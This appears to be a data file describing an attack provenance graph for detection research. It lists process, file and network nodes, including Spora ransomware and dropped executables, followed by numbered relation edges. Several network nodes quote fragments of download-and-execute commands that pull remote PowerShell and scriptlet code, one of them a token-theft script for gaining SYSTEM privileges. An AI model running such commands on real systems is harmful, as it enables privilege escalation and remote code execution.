34
MP*-nsCA5C.tmp
MF-\Users\admin\AppData\Local\Temp\peplus.m
TF-\deerbrook.ppt
SF-C:\Users\Public\coinmarketcap\coinmarketcap
MP-Notepad Soft.exe 
MP-reg.exe
TP*-ns9BE4.tmp
MP-appcmd.exe
MP-winhost.exe
SF-C:\Windows\System32\slui.exe
MF-\Users\admin\AppData\Local\Temp\xx.vb
MP-Spora.exe 
MP-control.exe
MP-Explorer.EXE
MF-C:\Users\admin\AppData\Local\Temp\5158c830d2dfb8a523c3c24077e67fe792346ffa443126ebf2d09ace68f73000.bmp
MP-softwarelagswitchc.exe 
MP-wmic.exe
MP*-Dieselmotorers.exe
SF-C:\Windows\system32\cmd.exe
TP-CareUEyes_setup.exe
MF-\Windows\System32\rundll32.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX
SO-https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct").Exec();window.close
TP-IEmode.exe 
SO-127.0.0.1
MF-\Users\admin\Desktop\0IuqaJTsFmOw8k4.exe
MF-C:\Users\admin\AppData\Local\Temp\pure
SF-C:\Users\admin\AppData\Local\Temp\PO-465514-180820.doc
MF-\Users\admin\AppData\Local\Temp\CCZZ.bat
MP-attrib.exe
TF-001983746763728927338.js
MF-\Users\admin\AppData\Local\Temp\_vnw.exe
TP*-PING.EXE
83
0 1 RD-1
0 2 EX-1
0 3 WR-1
0 4 FR-1
4 1 WR-1
4 2 WR-1
4 3 WR-1
0 5 FR-1
5 1 WR-1
5 2 WR-1
5 3 RD-1
4 5 UK-1
0 6 IJ-1
6 1 WR-2
6 2 CD-2
6 3 WR-2
0 7 FR-1
7 1 UK-2
0 8 FR-1
8 2 RD-2
8 3 WR-2
6 8 IJ-2
0 9 WR-1
6 9 WR-2
8 9 WR-2
0 10 EX-1
6 10 WR-2
8 10 EX-2
11 2 WR-2
11 3 WR-2
6 11 IJ-2
8 11 UK-2
12 2 RD-2
12 3 WR-2
6 12 UK-2
13 3 WR-2
13 9 WR-2
13 10 WR-2
13 14 WR-2
15 9 UK-2
16 10 RD-2
13 16 UK-2
17 10 WR-3
17 14 WR-3
17 18 EX-3
19 10 WR-3
19 14 UK-3
17 20 EX-3
21 17 RF-3
17 22 ST-3
17 23 ST-3
17 24 FR-3
24 18 WR-3
24 20 RD-3
21 24 RF-3
24 22 ST-3
23 24 RF-3
17 25 ST-3
25 24 RF-3
17 26 WR-3
24 26 RD-3
17 27 WR-3
24 27 RD-3
24 28 EX-3
24 29 RD-3
30 20 RD-3
30 21 ST-3
22 30 RF-3
30 23 ST-3
24 30 IJ-3
25 30 RF-3
30 26 RD-3
30 27 EX-3
30 28 WR-3
30 29 EX-3
30 31 WR-3
30 32 WR-3
25 33 RF-3
33 26 WR-4
33 27 EX-4
33 28 RD-4
33 29 WR-4
30 33 UK-3

